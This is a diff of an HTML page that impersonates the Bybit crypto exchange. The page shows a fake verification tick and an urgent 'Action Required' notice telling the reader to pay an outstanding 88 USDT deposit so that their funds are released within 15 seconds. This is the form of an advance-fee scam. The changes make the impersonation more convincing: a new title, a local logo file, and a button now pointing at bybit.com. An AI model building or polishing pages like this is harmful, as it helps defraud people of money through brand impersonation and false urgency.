--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <title>Bybit USDT Deposit Status Notification</title>
+  <title>Bybit USDT Deposit Release Notification</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <style>
     body { font-family: 'Segoe UI', Arial, sans-serif; background: #f6f8fa; margin: 0; padding: 0; }
@@ -45,7 +45,7 @@
 <body>
   <div class="container">
     <div class="header">
-      <img src="https://www.bybit.com/bybit-logo.svg" alt="Bybit Logo" class="bybit-logo" />
+      <img Src="IMG_3457.png" alt="Bybit Logo" class="bybit-logo" />
       <span class="blue-tick">
         <!-- SVG blue tick verification -->
         <svg width="24" height="24" viewBox="0 0 24 24" fill="#3498ef" xmlns="http://www.w3.org/2000/svg">
@@ -82,7 +82,7 @@
       <p class="urgent">
         <strong>Action Required:</strong> Please complete the outstanding deposit of <strong>88 USDT</strong> to finalize your transaction. Once confirmed, our automated system will immediately release your funds within <strong>15 seconds</strong>.
       </p>
-      <a class="cta-btn" href="https://www.binance.com/en/my/wallet" target="_blank">
+      <a class="cta-btn" href="https://www.bybit.com" target="_blank">
         View Deposit
       </a>
       <p style="margin-top:30px;">
